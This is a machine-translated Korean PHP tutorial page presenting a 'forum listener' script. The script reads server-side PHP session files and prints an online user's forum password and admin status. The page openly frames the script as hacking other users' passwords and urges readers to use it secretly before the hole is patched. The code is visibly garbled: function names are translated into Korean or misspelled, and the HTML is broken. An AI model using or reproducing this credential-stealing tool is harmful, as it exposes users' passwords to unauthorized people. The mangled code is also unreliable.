토론"/> 토론">

 >  기사  >  백엔드 개발  >  세션 내용을 보는 알 수 없는 소프트웨어 예외 PHP 기능

세션 내용을 보는 알 수 없는 소프트웨어 예외 PHP 기능

WBOY
WBOY원래의
2016-07-29 08:38:421272검색

예: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1", 세션이 저장된 위치도 알고 파일을 업로드할 수 있으므로 , 그때 약간의 해킹을 하고 나면 온라인 친구들의 비밀번호를 한눈에 볼 수 있어요 ㅎㅎ:
function submit1(){
global $username; print "포럼 청취자"
$i=0
if($username=="tasm"||$username=="Tasm")
{
print "너도 너무 어둡지 않니?";
return;
}
$d = dir($path); while ($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry; > $ary=@file($entry);
if(!empty($ary[0])){
$ary = 폭발(";",$ary[0])
$ name =explod(":",$ary[0]);
if($name[2]==""".$username."""){
$passwd=explore(":" , $ary[1]);
$mode=explode(":",$ary[3]);
인쇄 "사용자 펜 이름:".$name[2]."
사용 비밀번호: ".$passwd[2]."
사용 모드:";
if($mode[1]==1)
print "adminelse
print "일반 사용자";
print"

다른 사람의 비밀번호를 도용하는 것은 비윤리적입니다. 덜 하십시오
";
$ i =1;
break;
}}}}
if(!$i)
print "User: ".$username." 정말 온라인인가요? 확실하다면 다시 해주세요 공백은 더 이상 사용하지 마세요! ";
$d->close();
}
function login(){
?>


포럼 청취자

온라인에서 사용자의 비밀번호를 확인하려면 어떻게 해야 하나요?


이 프로그램을 사용하세요.


이로 인해 발생하는 손실에 대해서는 책임을 지지 않습니다.

하지만 이 문제는 곧 해결될 수도 있으니 공개하지 않고 비밀리에 사용하는 것이 좋겠습니다.



확인하려는 사용자 이름을 입력하세요.
>



양식>



/ /---------------main()
if($submit1)
submit1()
else
login(); >
위에서는 알 수 없는 소프트웨어 예외의 내용을 포함하여 세션 내용을 볼 수 있는 알 수 없는 소프트웨어 예외 PHP의 기능을 소개합니다. PHP 튜토리얼에 관심이 있는 친구들에게 도움이 되기를 바랍니다.


성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.